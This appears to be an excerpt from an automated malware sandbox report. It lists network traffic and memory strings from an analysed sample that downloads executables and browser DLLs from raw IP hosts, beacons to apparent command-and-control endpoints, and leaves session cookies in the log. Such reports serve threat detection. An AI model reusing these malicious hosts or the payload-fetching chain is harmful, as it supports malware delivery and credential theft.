Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGPm2u7EGIjCw4PtzX5gzzDlwzXIWtDXrCiRfdbHDSucDXyTngU0wLJluDFuO6KRqHMbqhlFxbvMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=Ram1jU97G6ZBnKUUJ8oMI4-XjULBzDD790zVj43iBZNk1Yp2YaPNHXrGAvGLRspoPDvdJcvektgjxpEjjxVGkUCXSctFEbyvv0N67MwU4FeBdKvf4ddYZiZKgFUux1935pXwz6RcpiBPOemLrBLXECHbF945fOhdYcRCbOGHnuw
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGPm2u7EGIjA9dOSf1SDRwKrHbolvoP0rB9qzZ3OV654e3Nqcz9gZgYsWMechJLShD5a3n0HBadgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=U1mNAjRYwf8kotXLaHRXjIKbCBpEhQgUsQnSx5kNtaoiWyyfmjbtTM2oYBZgyEvsoJPYIXbLzSJiFX-UcmWyliVD-zR1RlK95xi5BrjDst_SB4sfe96osAXmTUm1HiywIJFIsfh-7xRoEKc9pv9KCzM5YzglK92qpic1G_e4DOM
Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714346800049&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF

Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dllx
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dllB
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dllj
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2528909810.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php/
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php2
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php2496b2f8604de64a7a02afb624c0-release
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php3
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php=
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpD%D
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpF
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpQrR
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpW%Microsoft
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpY
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpZ
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpb
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpe
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpl.
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpl.ID
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpmD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpn
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpqD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpr
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpu
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpv
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpy
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php~
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/ons
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4FP
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000t-
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
